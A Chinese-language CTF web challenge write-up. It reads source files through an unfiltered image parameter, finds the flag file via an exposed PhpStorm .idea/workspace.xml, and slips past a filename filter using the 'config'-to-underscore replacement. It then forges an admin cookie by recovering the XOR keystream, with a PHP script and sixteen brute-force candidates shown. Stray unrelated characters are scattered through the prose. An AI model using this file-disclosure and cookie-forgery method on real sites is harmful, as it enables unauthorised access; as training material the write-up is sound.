題目標(biāo)題: 考腦洞李请,你能過么昆稿?
打開題目所給的鏈接纺座,發(fā)現(xiàn)是一張圖片。
1.png
當(dāng)時很疑惑明明是web題怎么會考隱寫溉潭。應(yīng)該是迷惑你的净响。
觀察鏈接可以嘗試下文件包含少欺。
提交:
index.php?jpg=index.php
然后查看網(wǎng)頁源代碼
得到以下內(nèi)容
<title>file:index.php</title><img src='[data:image/gif;base64,PD9waHANCi8qKg0KICogQ3JlYXRlZCBieSBQaHBTdG9ybS4NCiAqIERhdGU6IDIwMTUvMTEvMTYNCiAqIFRpbWU6IDE6MzENCiAqLw0KaGVhZGVyKCdjb250ZW50LXR5cGU6dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTgnKTsNCmlmKCEgaXNzZXQoJF9HRVRbJ2pwZyddKSkNCiAgICBoZWFkZXIoJ1JlZnJlc2g6MDt1cmw9Li9pbmRleC5waHA/anBnPWhlaS5qcGcnKTsNCiRmaWxlID0gJF9HRVRbJ2pwZyddOw0KZWNobyAnPHRpdGxlPmZpbGU6Jy4kZmlsZS4nPC90aXRsZT4nOw0KJGZpbGUgPSBwcmVnX3JlcGxhY2UoIi9bXmEtekEtWjAtOS5dKy8iLCIiLCAkZmlsZSk7DQokZmlsZSA9IHN0cl9yZXBsYWNlKCJjb25maWciLCJfIiwgJGZpbGUpOw0KJHR4dCA9IGJhc2U2NF9lbmNvZGUoZmlsZV9nZXRfY29udGVudHMoJGZpbGUpKTsNCg0KZWNobyAiPGltZyBzcmM9J2RhdGE6aW1hZ2UvZ2lmO2Jhc2U2NCwiLiR0eHQuIic+PC9pbWc+IjsNCg0KLyoNCiAqIENhbiB5b3UgZmluZCB0aGUgZmxhZyBmaWxlPw0KICoNCiAqLw0KDQo/Pg==](data:image/gif;base64,PD9waHANCi8qKg0KICogQ3JlYXRlZCBieSBQaHBTdG9ybS4NCiAqIERhdGU6IDIwMTUvMTEvMTYNCiAqIFRpbWU6IDE6MzENCiAqLw0KaGVhZGVyKCdjb250ZW50LXR5cGU6dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTgnKTsNCmlmKCEgaXNzZXQoJF9HRVRbJ2pwZyddKSkNCiAgICBoZWFkZXIoJ1JlZnJlc2g6MDt1cmw9Li9pbmRleC5waHA/anBnPWhlaS5qcGcnKTsNCiRmaWxlID0gJF9HRVRbJ2pwZyddOw0KZWNobyAnPHRpdGxlPmZpbGU6Jy4kZmlsZS4nPC90aXRsZT4nOw0KJGZpbGUgPSBwcmVnX3JlcGxhY2UoIi9bXmEtekEtWjAtOS5dKy8iLCIiLCAkZmlsZSk7DQokZmlsZSA9IHN0cl9yZXBsYWNlKCJjb25maWciLCJfIiwgJGZpbGUpOw0KJHR4dCA9IGJhc2U2NF9lbmNvZGUoZmlsZV9nZXRfY29udGVudHMoJGZpbGUpKTsNCg0KZWNobyAiPGltZyBzcmM9J2RhdGE6aW1hZ2UvZ2lmO2Jhc2U2NCwiLiR0eHQuIic+PC9pbWc+IjsNCg0KLyoNCiAqIENhbiB5b3UgZmluZCB0aGUgZmxhZyBmaWxlPw0KICoNCiAqLw0KDQo/Pg==)'></img>
去掉開頭的
data:image/gif;base64,
然后base64解碼得到
<?php
/**
* Created by PhpStorm.
* Date: 2015/11/16
* Time: 1:31
*/
header('content-type:text/html;charset=utf-8');
if(! isset($_GET['jpg']))
header('Refresh:0;url=./index.php?jpg=hei.jpg');
$file = $_GET['jpg'];
echo '<title>file:'.$file.'</title>';
$file = preg_replace("/[^a-zA-Z0-9.]+/","", $file);
$file = str_replace("config","_", $file);
$txt = base64_encode(file_get_contents($file));
echo "<img src='data:image/gif;base64,".$txt."'></img>";
/*
* Can you find the flag file?
*
*/
?>
這里可能會沒有思路。后來嘗試發(fā)現(xiàn)線索在Created by PhpStorm.這里
使用phpStorm開發(fā)的程序目錄下會有一個.idea文件夾用于存儲配置文件馋贤。
訪問這個配置文件可以知道網(wǎng)站的大體結(jié)構(gòu)赞别。
訪問:
/.idea/workspace.xml
返回的內(nèi)容為:
<?xml version="1.0" encoding="UTF-8"?>
<project version="4">
<component name="ChangeListManager">
<list default="true" id="4738030a-3c9f-45c6-8d23-a762415abc27" name="默認(rèn)的" comment="" />
<ignored path="phpctf.iws" />
<ignored path=".idea/workspace.xml" />
<ignored path=".idea/dataSources.local.xml" />
<option name="EXCLUDED_CONVERTED_TO_IGNORED" value="true" />
<option name="TRACKING_ENABLED" value="true" />
<option name="SHOW_DIALOG" value="false" />
<option name="HIGHLIGHT_CONFLICTS" value="true" />
<option name="HIGHLIGHT_NON_ACTIVE_CHANGELIST" value="false" />
<option name="LAST_RESOLUTION" value="IGNORE" />
</component>
<component name="ChangesViewManager" flattened_view="true" show_ignored="false" />
<component name="CreatePatchCommitExecutor">
<option name="PATCH_PATH" value="" />
</component>
<component name="ExecutionTargetManager" SELECTED_TARGET="default_target" />
<component name="FavoritesManager">
<favorites_list name="phpctf" />
</component>
<component name="FileEditorManager">
<leaf SIDE_TABS_SIZE_LIMIT_KEY="300">
<file leaf-file-name="fl3g_ichuqiu.php" pinned="false" current-in-tab="false">
<entry file="file://$PROJECT_DIR$/fl3g_ichuqiu.php">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="-4.071429">
<caret line="6" column="3" selection-start-line="6" selection-start-column="3" selection-end-line="6" selection-end-column="3" />
<folding />
</state>
</provider>
</entry>
</file>
<file leaf-file-name="config.php" pinned="false" current-in-tab="false">
<entry file="file://$PROJECT_DIR$/config.php">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="-6.107143">
<caret line="9" column="2" selection-start-line="9" selection-start-column="2" selection-end-line="9" selection-end-column="2" />
<folding />
</state>
</provider>
</entry>
</file>
<file leaf-file-name="index.php" pinned="false" current-in-tab="true">
<entry file="file://$PROJECT_DIR$/index.php">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.35359803">
<caret line="15" column="30" selection-start-line="15" selection-start-column="30" selection-end-line="15" selection-end-column="30" />
<folding />
</state>
</provider>
</entry>
</file>
</leaf>
</component>
<component name="IdeDocumentHistory">
<option name="CHANGED_PATHS">
<list>
<option value="$PROJECT_DIR$/x.php" />
<option value="$PROJECT_DIR$/config.php" />
<option value="$PROJECT_DIR$/fl3g_ichuqiu.php" />
</list>
</option>
</component>
<component name="JsBuildToolGruntFileManager" detection-done="true" />
<component name="JsBuildToolPackageJson" detection-done="true" />
<component name="JsGulpfileManager">
<detection-done>true</detection-done>
</component>
<component name="PhpServers">
<servers />
</component>
<component name="PhpWorkspaceProjectConfiguration" backward_compatibility_performed="true" />
<component name="ProjectFrameBounds">
<option name="x" value="242" />
<option name="y" value="21" />
<option name="width" value="1400" />
<option name="height" value="1000" />
</component>
<component name="ProjectLevelVcsManager" settingsEditedManually="false">
<OptionsSetting value="true" id="添加" />
<OptionsSetting value="true" id="移除" />
<OptionsSetting value="true" id="簽出" />
<OptionsSetting value="true" id="更新" />
<OptionsSetting value="true" id="狀態(tài)" />
<OptionsSetting value="true" id="編輯" />
<ConfirmationsSetting value="0" id="添加" />
<ConfirmationsSetting value="0" id="移除" />
</component>
<component name="ProjectView">
<navigator proportions="" version="1">
<flattenPackages />
<showMembers />
<showModules />
<showLibraryContents />
<hideEmptyPackages />
<abbreviatePackageNames />
<autoscrollToSource />
<autoscrollFromSource />
<sortByType />
<manualOrder />
<foldersAlwaysOnTop value="true" />
</navigator>
<panes />
</component>
<component name="PropertiesComponent">
<property name="WebServerToolWindowFactoryState" value="false" />
<property name="settings.editor.selected.configurable" value="fileTemplates" />
<property name="settings.editor.splitter.proportion" value="0.2" />
</component>
<component name="RunManager" selected="JavaScript Debug.fl3g_ichuqiu.php">
<configuration default="false" name="fl3g_ichuqiu.php" type="JavascriptDebugType" factoryName="JavaScript Debug" temporary="true" nameIsGenerated="true" uri="http://localhost:63342/phpctf/fl3g_ichuqiu.php">
<method />
</configuration>
<configuration default="true" type="JavascriptDebugType" factoryName="JavaScript Debug">
<method />
</configuration>
<configuration default="true" type="PHPUnitRunConfigurationType" factoryName="PHPUnit">
<TestRunner />
<method />
</configuration>
<configuration default="true" type="PhpBehatConfigurationType" factoryName="Behat">
<BehatRunner />
<method />
</configuration>
<configuration default="true" type="PhpLocalRunConfigurationType" factoryName="PHP Console">
<method />
</configuration>
<configuration default="true" type="js.build_tools.gulp" factoryName="Gulp.js">
<node-options />
<gulpfile />
<tasks />
<arguments />
<envs />
<method />
</configuration>
<configuration default="true" type="js.build_tools.npm" factoryName="npm">
<command value="run-script" />
<scripts />
<envs />
<method />
</configuration>
<list size="1">
<item index="0" class="java.lang.String" itemvalue="JavaScript Debug.fl3g_ichuqiu.php" />
</list>
<recent_temporary>
<list size="1">
<item index="0" class="java.lang.String" itemvalue="JavaScript Debug.fl3g_ichuqiu.php" />
</list>
</recent_temporary>
</component>
<component name="ShelveChangesManager" show_recycled="false" />
<component name="SvnConfiguration">
<configuration />
</component>
<component name="TaskManager">
<task active="true" id="Default" summary="Default task">
<changelist id="4738030a-3c9f-45c6-8d23-a762415abc27" name="默認(rèn)的" comment="" />
<created>1447597471149</created>
<option name="number" value="Default" />
<updated>1447597471149</updated>
</task>
<servers />
</component>
<component name="ToolWindowManager">
<frame x="242" y="21" width="1400" height="1000" extended-state="0" />
<editor active="false" />
<layout>
<window_info id="Project" active="false" anchor="left" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.25" sideWeight="0.5" order="0" side_tool="false" content_ui="combo" />
<window_info id="TODO" active="false" anchor="bottom" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.33" sideWeight="0.5" order="6" side_tool="false" content_ui="tabs" />
<window_info id="版本控制" active="false" anchor="bottom" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.33" sideWeight="0.5" order="7" side_tool="false" content_ui="tabs" />
<window_info id="Event Log" active="false" anchor="bottom" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.33" sideWeight="0.5" order="7" side_tool="true" content_ui="tabs" />
<window_info id="Database" active="false" anchor="right" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.33" sideWeight="0.5" order="3" side_tool="false" content_ui="tabs" />
<window_info id="Structure" active="false" anchor="left" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.25" sideWeight="0.5" order="1" side_tool="false" content_ui="tabs" />
<window_info id="Terminal" active="false" anchor="bottom" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.33" sideWeight="0.5" order="7" side_tool="false" content_ui="tabs" />
<window_info id="Favorites" active="false" anchor="left" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.33" sideWeight="0.5" order="2" side_tool="true" content_ui="tabs" />
<window_info id="Cvs" active="false" anchor="bottom" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.25" sideWeight="0.5" order="4" side_tool="false" content_ui="tabs" />
<window_info id="調(diào)試" active="false" anchor="bottom" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.33" sideWeight="0.5" order="7" side_tool="false" content_ui="tabs" />
<window_info id="Message" active="false" anchor="bottom" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.33" sideWeight="0.5" order="0" side_tool="false" content_ui="tabs" />
<window_info id="Commander" active="false" anchor="right" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.4" sideWeight="0.5" order="0" side_tool="false" content_ui="tabs" />
<window_info id="Inspection" active="false" anchor="bottom" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.4" sideWeight="0.5" order="5" side_tool="false" content_ui="tabs" />
<window_info id="Run" active="false" anchor="bottom" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.33" sideWeight="0.5" order="2" side_tool="false" content_ui="tabs" />
<window_info id="運(yùn)行" active="false" anchor="bottom" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.33" sideWeight="0.5" order="7" side_tool="false" content_ui="tabs" />
<window_info id="Hierarchy" active="false" anchor="right" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.25" sideWeight="0.5" order="2" side_tool="false" content_ui="combo" />
<window_info id="Find" active="false" anchor="bottom" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.33" sideWeight="0.5" order="1" side_tool="false" content_ui="tabs" />
<window_info id="Ant Build" active="false" anchor="right" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.25" sideWeight="0.5" order="1" side_tool="false" content_ui="tabs" />
<window_info id="Debug" active="false" anchor="bottom" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.4" sideWeight="0.5" order="3" side_tool="false" content_ui="tabs" />
</layout>
</component>
<component name="Vcs.Log.UiProperties">
<option name="RECENTLY_FILTERED_USER_GROUPS">
<collection />
</option>
<option name="RECENTLY_FILTERED_BRANCH_GROUPS">
<collection />
</option>
</component>
<component name="VcsContentAnnotationSettings">
<option name="myLimit" value="2678400000" />
</component>
<component name="XDebuggerManager">
<breakpoint-manager>
<option name="time" value="1" />
</breakpoint-manager>
<watches-manager />
</component>
<component name="editorHistoryManager">
<entry file="file://$PROJECT_DIR$/fl3g_ichuqiu.php">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.0">
<caret line="47" column="19" selection-start-line="47" selection-start-column="19" selection-end-line="47" selection-end-column="19" />
<folding />
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/index.php">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.0">
<caret line="0" column="0" selection-start-line="0" selection-start-column="0" selection-end-line="0" selection-end-column="0" />
<folding />
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/fl3g_ichuqiu.php">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="-4.071429">
<caret line="6" column="3" selection-start-line="6" selection-start-column="3" selection-end-line="6" selection-end-column="3" />
<folding />
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/config.php">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="-6.107143">
<caret line="9" column="2" selection-start-line="9" selection-start-column="2" selection-end-line="9" selection-end-column="2" />
<folding />
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/index.php">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.35359803">
<caret line="15" column="30" selection-start-line="15" selection-start-column="30" selection-end-line="15" selection-end-column="30" />
<folding />
</state>
</provider>
</entry>
</component>
</project>
發(fā)現(xiàn)了目錄結(jié)構(gòu)中的fl3g_ichuqiu.php 猜測flag在這里。
1.png
采用前面相同的方法來查看一下fl3g_ichuqiu.php的源代碼
訪問:
/index.php?jpg=fl3g_ichuqiu.php
返回的內(nèi)容是:
<title>file:fl3g_ichuqiu.php</title><img src='[data:image/gif;base64,](data:image/gif;base64,)'></img>
發(fā)現(xiàn)沒有返回數(shù)據(jù)配乓,猜測是被過濾了字符仿滔。
回到剛才的Index.php中發(fā)現(xiàn)是過濾了_,這里我們用config繞過
訪問:
/index.php?jpg=fl3gconfigichuqiu.php
返回:
<title>file:fl3gconfigichuqiu.php</title><img src='[data:image/gif;base64,PD9waHANCi8qKg0KICogQ3JlYXRlZCBieSBQaHBTdG9ybS4NCiAqIERhdGU6IDIwMTUvMTEvMTYNCiAqIFRpbWU6IDE6MzENCiAqLw0KZXJyb3JfcmVwb3J0aW5nKEVfQUxMIHx8IH5FX05PVElDRSk7DQppbmNsdWRlKCdjb25maWcucGhwJyk7DQpmdW5jdGlvbiByYW5kb20oJGxlbmd0aCwgJGNoYXJzID0gJ0FCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaMDEyMzQ1Njc4OWFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6Jykgew0KICAgICRoYXNoID0gJyc7DQogICAgJG1heCA9IHN0cmxlbigkY2hhcnMpIC0gMTsNCiAgICBmb3IoJGkgPSAwOyAkaSA8ICRsZW5ndGg7ICRpKyspCXsNCiAgICAgICAgJGhhc2ggLj0gJGNoYXJzW210X3JhbmQoMCwgJG1heCldOw0KICAgIH0NCiAgICByZXR1cm4gJGhhc2g7DQp9DQoNCmZ1bmN0aW9uIGVuY3J5cHQoJHR4dCwka2V5KXsNCiAgICBmb3IoJGk9MDskaTxzdHJsZW4oJHR4dCk7JGkrKyl7DQogICAgICAgICR0bXAgLj0gY2hyKG9yZCgkdHh0WyRpXSkrMTApOw0KICAgIH0NCiAgICAkdHh0ID0gJHRtcDsNCiAgICAkcm5kPXJhbmRvbSg0KTsNCiAgICAka2V5PW1kNSgkcm5kLiRrZXkpOw0KICAgICRzPTA7DQogICAgZm9yKCRpPTA7JGk8c3RybGVuKCR0eHQpOyRpKyspew0KICAgICAgICBpZigkcyA9PSAzMikgJHMgPSAwOw0KICAgICAgICAkdHRtcCAuPSAkdHh0WyRpXSBeICRrZXlbKyskc107DQogICAgfQ0KICAgIHJldHVybiBiYXNlNjRfZW5jb2RlKCRybmQuJHR0bXApOw0KfQ0KZnVuY3Rpb24gZGVjcnlwdCgkdHh0LCRrZXkpew0KICAgICR0eHQ9YmFzZTY0X2RlY29kZSgkdHh0KTsNCiAgICAkcm5kID0gc3Vic3RyKCR0eHQsMCw0KTsNCiAgICAkdHh0ID0gc3Vic3RyKCR0eHQsNCk7DQogICAgJGtleT1tZDUoJHJuZC4ka2V5KTsNCg0KICAgICRzPTA7DQogICAgZm9yKCRpPTA7JGk8c3RybGVuKCR0eHQpOyRpKyspew0KICAgICAgICBpZigkcyA9PSAzMikgJHMgPSAwOw0KICAgICAgICAkdG1wIC49ICR0eHRbJGldXiRrZXlbKyskc107DQogICAgfQ0KICAgIGZvcigkaT0wOyRpPHN0cmxlbigkdG1wKTskaSsrKXsNCiAgICAgICAgJHRtcDEgLj0gY2hyKG9yZCgkdG1wWyRpXSktMTApOw0KICAgIH0NCiAgICByZXR1cm4gJHRtcDE7DQp9DQokdXNlcm5hbWUgPSBkZWNyeXB0KCRfQ09PS0lFWyd1c2VyJ10sJGtleSk7DQppZiAoJHVzZXJuYW1lID09ICdzeXN0ZW0nKXsNCiAgICBlY2hvICRmbGFnOw0KfWVsc2V7DQogICAgc2V0Y29va2llKCd1c2VyJyxlbmNyeXB0KCdndWVzdCcsJGtleSkpOw0KICAgIGVjaG8gIuKVrijila/ilr3ilbAp4pWtIjsNCn0NCj8+](data:image/gif;base64,PD9waHANCi8qKg0KICogQ3JlYXRlZCBieSBQaHBTdG9ybS4NCiAqIERhdGU6IDIwMTUvMTEvMTYNCiAqIFRpbWU6IDE6MzENCiAqLw0KZXJyb3JfcmVwb3J0aW5nKEVfQUxMIHx8IH5FX05PVElDRSk7DQppbmNsdWRlKCdjb25maWcucGhwJyk7DQpmdW5jdGlvbiByYW5kb20oJGxlbmd0aCwgJGNoYXJzID0gJ0FCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaMDEyMzQ1Njc4OWFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6Jykgew0KICAgICRoYXNoID0gJyc7DQogICAgJG1heCA9IHN0cmxlbigkY2hhcnMpIC0gMTsNCiAgICBmb3IoJGkgPSAwOyAkaSA8ICRsZW5ndGg7ICRpKyspCXsNCiAgICAgICAgJGhhc2ggLj0gJGNoYXJzW210X3JhbmQoMCwgJG1heCldOw0KICAgIH0NCiAgICByZXR1cm4gJGhhc2g7DQp9DQoNCmZ1bmN0aW9uIGVuY3J5cHQoJHR4dCwka2V5KXsNCiAgICBmb3IoJGk9MDskaTxzdHJsZW4oJHR4dCk7JGkrKyl7DQogICAgICAgICR0bXAgLj0gY2hyKG9yZCgkdHh0WyRpXSkrMTApOw0KICAgIH0NCiAgICAkdHh0ID0gJHRtcDsNCiAgICAkcm5kPXJhbmRvbSg0KTsNCiAgICAka2V5PW1kNSgkcm5kLiRrZXkpOw0KICAgICRzPTA7DQogICAgZm9yKCRpPTA7JGk8c3RybGVuKCR0eHQpOyRpKyspew0KICAgICAgICBpZigkcyA9PSAzMikgJHMgPSAwOw0KICAgICAgICAkdHRtcCAuPSAkdHh0WyRpXSBeICRrZXlbKyskc107DQogICAgfQ0KICAgIHJldHVybiBiYXNlNjRfZW5jb2RlKCRybmQuJHR0bXApOw0KfQ0KZnVuY3Rpb24gZGVjcnlwdCgkdHh0LCRrZXkpew0KICAgICR0eHQ9YmFzZTY0X2RlY29kZSgkdHh0KTsNCiAgICAkcm5kID0gc3Vic3RyKCR0eHQsMCw0KTsNCiAgICAkdHh0ID0gc3Vic3RyKCR0eHQsNCk7DQogICAgJGtleT1tZDUoJHJuZC4ka2V5KTsNCg0KICAgICRzPTA7DQogICAgZm9yKCRpPTA7JGk8c3RybGVuKCR0eHQpOyRpKyspew0KICAgICAgICBpZigkcyA9PSAzMikgJHMgPSAwOw0KICAgICAgICAkdG1wIC49ICR0eHRbJGldXiRrZXlbKyskc107DQogICAgfQ0KICAgIGZvcigkaT0wOyRpPHN0cmxlbigkdG1wKTskaSsrKXsNCiAgICAgICAgJHRtcDEgLj0gY2hyKG9yZCgkdG1wWyRpXSktMTApOw0KICAgIH0NCiAgICByZXR1cm4gJHRtcDE7DQp9DQokdXNlcm5hbWUgPSBkZWNyeXB0KCRfQ09PS0lFWyd1c2VyJ10sJGtleSk7DQppZiAoJHVzZXJuYW1lID09ICdzeXN0ZW0nKXsNCiAgICBlY2hvICRmbGFnOw0KfWVsc2V7DQogICAgc2V0Y29va2llKCd1c2VyJyxlbmNyeXB0KCdndWVzdCcsJGtleSkpOw0KICAgIGVjaG8gIuKVrijila/ilr3ilbAp4pWtIjsNCn0NCj8+)'></img>
解碼之后犹芹,得到
<?php
/**
* Created by PhpStorm.
* Date: 2015/11/16
* Time: 1:31
*/
error_reporting(E_ALL || ~E_NOTICE);
include('config.php');
function random($length, $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz') {
$hash = '';
$max = strlen($chars) - 1;
for($i = 0; $i < $length; $i++) {
$hash .= $chars[mt_rand(0, $max)];
}
return $hash;
}
function encrypt($txt,$key){
for($i=0;$i<strlen($txt);$i++){
$tmp .= chr(ord($txt[$i])+10);
}
$txt = $tmp;
$rnd=random(4);
$key=md5($rnd.$key);
$s=0;
for($i=0;$i<strlen($txt);$i++){
if($s == 32) $s = 0;
$ttmp .= $txt[$i] ^ $key[++$s];
}
return base64_encode($rnd.$ttmp);
}
function decrypt($txt,$key){
$txt=base64_decode($txt);
$rnd = substr($txt,0,4);
$txt = substr($txt,4);
$key=md5($rnd.$key);
$s=0;
for($i=0;$i<strlen($txt);$i++){
if($s == 32) $s = 0;
$tmp .= $txt[$i]^$key[++$s];
}
for($i=0;$i<strlen($tmp);$i++){
$tmp1 .= chr(ord($tmp[$i])-10);
}
return $tmp1;
}
$username = decrypt($_COOKIE['user'],$key);
if ($username == 'system'){
echo $flag;
}else{
setcookie('user',encrypt('guest',$key));
echo "╮(╯▽╰)╭";
}
?>
分析之后flag應(yīng)該是在config中崎页。fl3g_ichuqiu.php文件接收本地cookie值然后解密之后如果等于system即可輸出flag,我們要做的就是研究它的加密算法如何讓fl3g_ichuqiu.php解密cookie中的username讓其剛好等于system腰埂。
破解這個算法的著手點(diǎn)就是我們已知guest加密之后的結(jié)果飒焦。
先用burpsuite攔截數(shù)據(jù)包讀取cookie然后運(yùn)行腳本。屿笼。
用PHP寫了個腳本(逃~
<?php
error_reporting(E_ALL || ~E_NOTICE);
$text = 'guest';
$cookie_guest = 'dk9FS0hOXUhH';
$cookie_guest = base64_decode($cookie_guest);
$rnd = substr($cookie_guest,0,4);
$cookie_guest = substr($cookie_guest,4);
for ($i = 0; $i < strlen($text); $i++) {
$text[$i] = chr(ord($text[$i])+10);
}
for ($i = 0; $i < strlen($text); $i++) {
$key .= ($text[$i] ^ $cookie_guest[$i]);
}
$text2 = 'system';
for ($i = 0; $i < strlen($text2); $i++) {
$text2[$i] = chr(ord($text2[$i])+10);
}
$t = '0123456789abcdef';
for ($j = 0; $j < strlen($t); $j++) {
$key_temp = $key.$t[$j];
$result = '';
for ($i = 0; $i < strlen($text2); $i++) {
$result .= ($key_temp[$i] ^ $text2[$i]);
}
$result = base64_encode($rnd.$result);
echo $result."\n";
}
?>
由于guest只有五位system有六位牺荠,所以最后一位我們需要爆破。驴一。
在腳本中已經(jīng)寫好了所有六位的情況休雌,運(yùn)行腳本輸出。肝断。
dk9FS0SyT0tWRw==
dk9FS0SyT0tWRg==
dk9FS0SyT0tWRQ==
dk9FS0SyT0tWRA==
dk9FS0SyT0tWQw==
dk9FS0SyT0tWQg==
dk9FS0SyT0tWQQ==
dk9FS0SyT0tWQA==
dk9FS0SyT0tWTw==
dk9FS0SyT0tWTg==
dk9FS0SyT0tWFg==
dk9FS0SyT0tWFQ==
dk9FS0SyT0tWFA==
dk9FS0SyT0tWEw==
dk9FS0SyT0tWEg==
dk9FS0SyT0tWEQ==
載入到burpsuite中爆破就好了
找到返回的數(shù)據(jù)包中較大的Length包查看返回的數(shù)據(jù)中就有flag杈曲。
